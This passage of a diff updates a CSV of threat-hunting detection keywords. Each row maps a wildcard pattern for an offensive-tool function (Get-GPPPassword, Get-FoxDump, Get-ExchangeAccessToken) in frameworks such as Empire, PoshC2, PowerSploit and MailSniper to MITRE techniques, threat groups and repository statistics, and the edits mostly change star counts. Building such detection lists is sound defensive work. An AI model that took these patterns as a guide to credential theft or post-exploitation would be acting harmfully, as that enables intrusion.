Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Get-ExchangeAccessToken*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Get-ExoPsAccessToken*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*getExploit.py*","offensive_tool_keyword","getExploit","Python script to explore exploits from exploit-db.com. Exist a similar script in Kali Linux. but in difference this python script will have provide more flexibility at search and download time.","T1587 - T1068 - T1211 - T1210 - T1588","TA0006 - TA0002 - TA0009 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Gioyik/getExploit","1","1","N/A","N/A","1","43","27","2015-06-26T16:38:55Z","2015-01-03T03:26:21Z" "*getexploitablesystem*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Get-ExploitableSystem*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" -"*Get-ExploitableSystem*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Get-ExploitableUnquotedPath*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Get-ExploitableSystem*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-ExploitableUnquotedPath*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*Get-FakeServiceUsers*","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","270","60","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" -"*Get-FireFoxHistory*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-FoxDump*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-FoxDump*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1151","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*getgppgroups *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Get-GPPInnerFields*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*getgpppassword *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Get-FireFoxHistory*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-FoxDump*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-FoxDump*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1151","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*getgppgroups *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Get-GPPInnerFields*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*getgpppassword *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*Get-GPPPassword -*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*Get-GPPPassword*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SiteListPassword.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-GPPPassword*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Get-GPPPassword.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1124","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-GPPPassword.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*Get-HeadersWithPrtCookies*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Get-GPPPassword*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SiteListPassword.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-GPPPassword*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - 